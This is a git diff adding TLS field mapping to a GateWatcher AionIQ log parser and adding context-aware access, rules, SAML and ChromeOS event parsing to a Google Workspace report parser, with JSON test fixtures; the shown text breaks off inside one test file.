retrohunt alerts name: gatewatcher.ttp diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml index 45330587a..845abe396 100644 --- a/GateWatcher/aioniq/ingest/parser.yml +++ b/GateWatcher/aioniq/ingest/parser.yml @@ -10,7 +10,7 @@ pipeline: external: name: date.parse properties: - input_field: "{{json_load.message.timestamp_analyzed}}" + input_field: "{{json_load.message.timestamp_detected}}" output_field: datetime format: null timezone: UTC @@ -29,6 +29,8 @@ pipeline: description: DGA - name: retrohunt description: Retrohunt + - name: tls + description: TLS stages: common: actions: @@ -122,7 +124,6 @@ stages: gatewatcher.sip: "{{json_load.message.sip}}" gatewatcher.smb: "{{json_load.message.smb}}" gatewatcher.ssh: "{{json_load.message.ssh}}" - gatewatcher.tls: "{{json_load.message.tls}}" file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" gatewatcher.dhcp: "{{json_load.message.dhcp}}" gatewatcher.dnp3: "{{json_load.message.dnp3}}" @@ -202,3 +203,16 @@ stages: gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" + tls: + actions: + - set: + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.ja3s: "{{json_load.message.tls.ja3s.hash}}" diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index f16f95623..6d7eb789a 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json @@ -17,7 +17,7 @@ "module": "powershell", "severity": 1 }, - "@timestamp": "2023-03-22T10:32:50.269000Z", + "@timestamp": "2023-03-22T10:30:37.145000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index b9db082ca..9d702ce4d 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json @@ -17,7 +17,7 @@ "module": "dga", "severity": 1 }, - "@timestamp": "2023-03-22T10:46:08.487000Z", + "@timestamp": "2023-03-22T10:25:54.903000Z", "destination": { "address": "pgoadcmgqfacj.com", "domain": "pgoadcmgqfacj.com", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index ba95cc211..b5d0a4f69 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json @@ -20,7 +20,7 @@ "info" ] }, - "@timestamp": "2023-03-22T10:53:13.408000Z", + "@timestamp": "2023-03-22T10:35:22.615000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json index fd29bcfa4..7c8728304 100644 --- a/GateWatcher/aioniq/tests/retrohunt.json +++ b/GateWatcher/aioniq/tests/retrohunt.json @@ -17,7 +17,7 @@ "module": "retrohunt", "severity": 1 }, - "@timestamp": "2023-06-12T10:12:39.001000Z", + "@timestamp": "2023-06-09T14:08:46.845000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json index 1de9534f5..626ee8eb7 100644 --- a/GateWatcher/aioniq/tests/sigflow-alert.json +++ b/GateWatcher/aioniq/tests/sigflow-alert.json @@ -19,7 +19,7 @@ "module": "alert", "severity": 1 }, - "@timestamp": "2023-03-22T10:44:08.001000Z", + "@timestamp": "2023-03-22T10:25:55.690000Z", "destination": { "address": "2.2.2.2", "bytes": 90364, diff --git a/GateWatcher/aioniq/tests/sigflow-file.json b/GateWatcher/aioniq/tests/sigflow-file.json index 2e1580dce..7e9cc8b6a 100644 --- a/GateWatcher/aioniq/tests/sigflow-file.json +++ b/GateWatcher/aioniq/tests/sigflow-file.json @@ -16,7 +16,7 @@ ], "module": "fileinfo" }, - "@timestamp": "2023-03-22T10:44:07.998000Z", + "@timestamp": "2023-03-22T10:25:55.469000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-meta.json b/GateWatcher/aioniq/tests/sigflow-meta.json index 4da5dbc30..6e8cba037 100644 --- a/GateWatcher/aioniq/tests/sigflow-meta.json +++ b/GateWatcher/aioniq/tests/sigflow-meta.json @@ -16,7 +16,7 @@ ], "module": "http" }, - "@timestamp": "2023-03-22T10:44:07.997000Z", + "@timestamp": "2023-03-22T10:25:55.377000Z", "destination": { "address": "2.2.2.2", "ip": "2.2.2.2", diff --git a/GateWatcher/aioniq/tests/sigflow-tls.json b/GateWatcher/aioniq/tests/sigflow-tls.json new file mode 100644 index 000000000..ff8624608 --- /dev/null +++ b/GateWatcher/aioniq/tests/sigflow-tls.json @@ -0,0 +1,68 @@ +{ + "input": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Gatewatcher AionIQ v102", + "dialect_uuid": "bba2bed2-d925-440f-a0ce-dbcae04eaf26" + } + } + }, + "expected": { + "message": "{\"uuid\":\"b96777f9-6409-4864-b8a1-452094a93c5d\",\"host\":\"gcap-xxxxxxxxx.domain.local\",\"ether\":{\"dest_mac\":\"e6:43:7e:91:1b:92\",\"src_mac\":\"82:df:ee:4f:81:af\"},\"type\":\"suricata\",\"dest_ip\":\"5.6.7.8\",\"src_port\":64809,\"flow_id\":1366008699485799,\"timestamp_analyzed\":\"2024-11-21T13:02:44.291Z\",\"timestamp\":\"2024-11-21T13:02:02.870913+0000\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"event_type\":\"tls\",\"src_ip\":\"1.2.3.4\",\"dest_port\":443,\"in_iface\":\"mon2\",\"tls\":{\"sni\":\"www.microsoft.com\",\"version\":\"TLS 1.3\",\"ja3s\":{\"string\":\"771,4866,43-51\",\"hash\":\"15af977ce25de452b96affa2addb1036\"}},\"@version\":\"1\",\"proto\":\"TCP\",\"gcap\":\"gcap-xxxxxxxxx.domain.local\",\"@timestamp\":\"2024-11-21T13:02:44.291Z\"}\n", + "event": { + "category": [ + "network" + ], + "module": "tls" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "port": 443 + }, + "gatewatcher": { + "event_type": "tls", + "flow_id": "1366008699485799", + "gcap": "gcap-xxxxxxxxx.domain.local", + "gcenter": "gcenter-xxxxxxxx.domain.local", + "timestamp_analyzed": "2024-11-21T13:02:44.291Z", + "tls": "{\"ja3s\": {\"hash\": \"15af977ce25de452b96affa2addb1036\", \"string\": \"771,4866,43-51\"}, \"sni\": \"www.microsoft.com\", \"version\": \"TLS 1.3\"}", + "tls_sni": "www.microsoft.com", + "type": "suricata" + }, + "network": { + "transport": "TCP" + }, + "observer": { + "hostname": "gcap-xxxxxxxxx.domain.local", + "mac": [ + "82:df:ee:4f:81:af", + "e6:43:7e:91:1b:92" + ], + "name": "gcap-xxxxxxxxx.domain.local", + "type": "ids", + "version": "0.2" + }, + "related": { + "hosts": [ + "gcap-xxxxxxxxx.domain.local" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 64809 + }, + "tls": { + "server": { + "ja3s": "15af977ce25de452b96affa2addb1036" + }, + "version": "TLS 1.3" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index 84b0db0f6..a8ee3a54d 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -1,3 +1,8 @@ +google.report.access.application: + description: Application name + name: google.report.access.application + type: keyword + google.report.actor.email: description: '' name: google.report.actor.email @@ -33,6 +38,46 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword +google.report.rule.data_source: + description: Data source + name: google.report.rule.data_source + type: keyword + +google.report.rule.name: + description: Name of the rule + name: google.report.rule.name + type: keyword + +google.report.rule.scan_type: + description: Scan type + name: google.report.rule.scan_type + type: keyword + +google.report.rule.severity: + description: Severity of the rule + name: google.report.rule.severity + type: keyword + +google.report.rule.type: + description: Rule type + name: google.report.rule.type + type: keyword + +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name + type: keyword + +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator + type: keyword + +google.report.saml.status_code: + description: SAML response status + name: google.report.saml.status_code + type: keyword + google.report.token.app_name: description: Token authorization application name name: google.report.token.app_name diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json index 6a934ee3d..4633f32de 100644 --- a/Google Cloud/google-report/_meta/smart-descriptions.json +++ b/Google Cloud/google-report/_meta/smart-descriptions.json @@ -168,6 +168,273 @@ } ] }, + { + "value": " Access to {google.report.access.application} was denied for {user.email} : {event.action}", + "conditions": [ + { + "field": "network.application", + "value": "context_aware_access" + }, + { + "field": "google.report.access.application" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + } + ] + }, + { + "value": "The {google.report.rule.type} action was completed with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "action_complete" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "The {google.report.rule.type} content was matched with a severity of {google.report.rule.severity}, using the {google.report.rule.name} rule applied to the {google.report.rule.data_source}", + "conditions": [ + { + "field": "network.application", + "value": "rules" + }, + { + "field": "event.action", + "value": "content_matched" + }, + { + "field": "google.report.rule.severity" + }, + { + "field": "google.report.rule.name" + }, + { + "field": "google.report.rule.data_source" + }, + { + "field": "google.report.rule.type" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name} with status: {google.report.saml.status_code}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + }, + { + "field": "google.report.saml.status_code" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} from {google.report.saml.application_name}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + }, + { + "field": "event.action" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} successfully logged in by {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_success" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + } + ] + }, + { + "value": "User {user.email} failed to log in using {network.application} service : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "saml" + }, + { + "field": "event.action", + "value": "login_failure" + }, + { + "field": "user.email" + }, + { + "field": "google.report.saml.application_name" + } + ] + }, + { + "value": "Device {device.model.name} with model ID {device.model.identifier} is {event.action} in the {network.application} application", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROMEOS_PERIPHERAL_STATUS_UPDATED" + }, + { + "field": "device.model.name" + }, + { + "field": "device.model.identifier" + } + ] + }, + { + "value": "The user with ID {user.id} on the {device.model.name} device logged out due to: {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGOUT_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {device.model.name} device log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, + { + "value": "The user with id {user.id} on the {host.name} host log in : {event.reason}", + "conditions": [ + { + "field": "network.application", + "value": "chrome" + }, + { + "field": "event.action", + "value": "CHROME_OS_LOGIN_EVENT" + }, + { + "field": "event.reason" + }, + { + "field": "device.model.name" + }, + { + "field": "user.id" + } + ] + }, { "value": "{source.ip} with ID {user.id} changing in the {network.application} application", "conditions": [ diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index bd5fd0d4e..4f5192ea6 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -1,4 +1,5 @@ name: google-report +ignored_values: ["UNKNOWN"] pipeline: - name: json_event external: @@ -28,6 +29,14 @@ pipeline: filter: '{{ json_event.message.id.applicationName == "admin"}}' - name: set_vault_fields filter: '{{ json_event.message.id.applicationName == "vault"}}' + - name: set_context_aware_fields + filter: '{{ json_event.message.id.applicationName == "context_aware_access"}}' + - name: set_rules_fields + filter: '{{ json_event.message.id.applicationName == "rules"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' + - name: set_chrome_fields + filter: '{{ json_event.message.id.applicationName == "chrome"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -157,6 +166,8 @@ stages: network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}' google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}' + user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}' + source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}' set_groups_enterprise_fields: actions: @@ -258,3 +269,69 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_context_aware_fields: + actions: + - set: + event.type: ["denied"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_DEVICE_ID" %}{{param.value}}{% endif %}{% endfor %}' + google.report.access.application: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "CAA_APPLICATION" %}{{param.value}}{% endif %}{% endfor %}' + + set_rules_fields: + actions: + - set: + google.report.rule.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_name" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "rule_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.data_source: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "data_source" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.scan_type: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "scan_type" %}{{param.value}}{% endif %}{% endfor %}' + google.report.rule.severity: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "severity" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["info"] + filter: '{{ json_event.message.events[0].name in ["action_complete", "label_applied", "rule_trigger", "rule_match", "content_matched"]}}' + + - set: + event.type: ["deletion"] + filter: '{{ json_event.message.events[0].name == "label_removed"}}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "label_field_value_changed"}}' + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' + + set_chrome_fields: + actions: + - set: + event.category: ["web"] + organization.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ORG_UNIT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "EVENT_REASON" %}{{param.value}}{% endif %}{% endfor %}' + device.model.identifier: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_ID" %}{{param.value}}{% endif %}{% endfor %}' + host.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.model.name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "PRODUCT_NAME" %}{{param.value}}{% endif %}{% endfor %}' + device.manufacturer: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "VENDOR_NAME" %}{{param.value}}{% endif %}{% endfor %}' + host.os.full: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "DEVICE_PLATFORM" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["change"] + filter: '{{ json_event.message.events[0].name == "CHROMEOS_PERIPHERAL_STATUS_UPDATED"}}' + + - set: + event.type: ["connection"] + filter: '{{ json_event.message.events[0].name in ["CHROME_OS_LOGOUT_EVENT", "CHROME_OS_LOGIN_EVENT"]}}' diff --git a/Google Cloud/google-report/tests/test_access_sample_1.json b/Google Cloud/google-report/tests/test_access_sample_1.json new file mode 100644 index 000000000..e83076db1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_access_sample_1.json @@ -0,0 +1,58 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:23:22.470Z\",\"uniqueQualifier\":\"-7203312395540000000\",\"applicationName\":\"context_aware_access\",\"customerId\":\"C02i38lll\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"john.doe@test.com\",\"profileId\":\"117564289545555555555\"},\"ipAddress\":\"9.3.2.1\",\"events\":[{\"type\":\"CONTEXT_AWARE_ACCESS_USER_EVENT\",\"name\":\"MONITOR_MODE_ACCESS_DENY_EVENT\",\"parameters\":[{\"name\":\"CAA_ACCESS_LEVEL_APPLIED\",\"multiValue\":[\"is admin-approved IOS\",\"is admin-approved android\",\"Is Corporate Device\"]},{\"name\":\"CAA_ACCESS_LEVEL_UNSATISFIED\",\"multiValue\":[\"is admin-approved android\",\"Crowdstrike Compliant Device\",\"is admin-approved IOS\",\"Is Corporate Device\"]},{\"name\":\"CAA_APPLICATION\",\"value\":\"GMAIL\"},{\"name\":\"BLOCKED_API_ACCESS\",\"multiValue\":[\"GMAIL\"]},{\"name\":\"CAA_DEVICE_ID\",\"value\":\"UNKNOWN\"},{\"name\":\"CAA_DEVICE_STATE\",\"value\":\"No Device Signals\"}]}]}", + "event": { + "action": "MONITOR_MODE_ACCESS_DENY_EVENT", + "dataset": "admin#reports#activity", + "type": [ + "denied" + ] + }, + "@timestamp": "2024-11-07T14:23:22.470000Z", + "cloud": { + "account": { + "id": "C02i38lll" + } + }, + "google": { + "report": { + "access": { + "application": "GMAIL" + }, + "actor": { + "email": "john.doe@test.com" + } + } + }, + "network": { + "application": "context_aware_access" + }, + "related": { + "ip": [ + "9.3.2.1" + ], + "user": [ + "john.doe" + ] + }, + "source": { + "address": "9.3.2.1", + "ip": "9.3.2.1" + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "117564289545555555555", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_1.json b/Google Cloud/google-report/tests/test_chrome_sample_1.json new file mode 100644 index 000000000..6567eebf1 --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_1.json @@ -0,0 +1,53 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:17:42.050Z\",\"uniqueQualifier\":\"821596950209300000\",\"applicationName\":\"chrome\",\"customerId\":\"C01x70000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zF\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097979777777\"},\"events\":[{\"type\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED_TYPE\",\"name\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731071860000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_PERIPHERAL_STATUS_UPDATED\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"},{\"name\":\"PRODUCT_ID\",\"value\":\"0x2\"},{\"name\":\"PRODUCT_NAME\",\"value\":\"2.0 root hub\"},{\"name\":\"VENDOR_ID\",\"value\":\"0x1ddd\"},{\"name\":\"VENDOR_NAME\",\"value\":\"Linux Foundation\"}]}]}", + "event": { + "action": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "category": [ + "web" + ], + "dataset": "admin#reports#activity", + "reason": "CHROMEOS_PERIPHERAL_STATUS_UPDATED", + "type": [ + "change" + ] + }, + "@timestamp": "2024-11-08T13:17:42.050000Z", + "cloud": { + "account": { + "id": "C01x70000" + } + }, + "device": { + "manufacturer": "Linux Foundation", + "model": { + "identifier": "0x2", + "name": "2.0 root hub" + } + }, + "host": { + "name": "S5NXNZ00A000000", + "os": { + "full": "ChromeOS 16033.51.0" + } + }, + "network": { + "application": "chrome" + }, + "organization": { + "name": "test_org" + }, + "user": { + "id": "105250506097979777777" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_chrome_sample_2.json b/Google Cloud/google-report/tests/test_chrome_sample_2.json new file mode 100644 index 000000000..990b7f47c --- /dev/null +++ b/Google Cloud/google-report/tests/test_chrome_sample_2.json @@ -0,0 +1,46 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-08T13:20:40.000Z\",\"uniqueQualifier\":\"-2392455694764444444444\",\"applicationName\":\"chrome\",\"customerId\":\"C01x7c000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi\\\"\",\"actor\":{\"callerType\":\"USER\",\"profileId\":\"105250506097973333333333\"},\"events\":[{\"type\":\"CHROME_OS_LOGIN_LOGOUT_TYPE\",\"name\":\"CHROME_OS_LOGIN_EVENT\",\"parameters\":[{\"name\":\"TIMESTAMP\",\"intValue\":\"1731072040000\"},{\"name\":\"EVENT_REASON\",\"value\":\"CHROMEOS_KIOSK_SESSION_LOGIN\"},{\"name\":\"DEVICE_NAME\",\"value\":\"S5NXNZ00A000000\"},{\"name\":\"DEVICE_USER\",\"value\":\"-\"},{\"name\":\"CLIENT_TYPE\",\"value\":\"CHROME_OS_DEVICE\"},{\"name\":\"DEVICE_PLATFORM\",\"value\":\"ChromeOS 16033.51.0\"},{\"name\":\"DIRECTORY_DEVICE_ID\",\"value\":\"4ebc77ae-ce6b-4857\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"test_org\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 